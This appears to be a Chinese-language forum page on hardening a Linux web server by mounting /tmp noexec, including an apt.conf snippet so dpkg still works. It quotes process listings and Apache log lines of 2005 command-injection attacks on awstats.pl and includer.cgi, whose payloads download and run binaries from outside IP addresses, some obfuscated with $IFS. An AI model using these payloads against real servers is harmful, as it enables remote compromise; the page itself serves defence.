Study Area Facebook粉絲團http://www.facebook.com/sataiwan
0 會員 與 1 訪客 正在閱讀本文。
apache 7667 2306 0 13:20 ? 00:00:00 sh -c cd /tmp;wget 24.224.174.18/listen;chmod +x listen;./listen apache 7668 7667 0 13:20 ? 00:00:00 wget 24.224.174.18/listenapache 7671 6289 0 13:20 ? 00:00:00 sh -c cd /tmp;wget 24.224.174.18/listen;chmod +x listen;./listen apache 7672 7671 0 13:20 ? 00:00:00 wget 24.224.174.18/listen
65.30.76.175 - - [14/Nov/2005:02:40:35 +0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 374 "-"
66.92.235.50 - - [15/Nov/2005:03:50:55 +0800] "GET /scgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 34466.92.235.50 - - [15/Nov/2005:03:51:27 +0800] "GET /cgi-bin/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 33766.92.235.50 - - [15/Nov/2005:03:51:31 +0800] "GET /cgi-bin/include/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 34566.92.235.50 - - [15/Nov/2005:03:51:32 +0800] "GET /scgi-bin/include/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 34666.92.235.50 - - [15/Nov/2005:03:51:34 +0800] "GET /cgi-bin/inc/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 34166.92.235.50 - - [15/Nov/2005:03:51:35 +0800] "GET /scgi-bin/inc/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 34266.92.235.50 - - [15/Nov/2005:03:51:36 +0800] "GET /cgi-local/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 339
怎麼把 /tmp mount 成 noexec 呢?
Dpkg { Pre-Invoke { "/bin/mount /tmp -o remount,exec"; }; Post-Invoke { "/bin/mount /tmp -o remount,noexec"; }; };
把 /tmp mount 成 noexec, 在某些程式的運作可能會有問題. 碰到時再想辦法去避開.例如, 在 debian 上頭, 這樣會造成 dpkg (apt) 無法正常運作, 只要在 /etc/apt/apt.conf 中加上下面這一段設定就可以解決.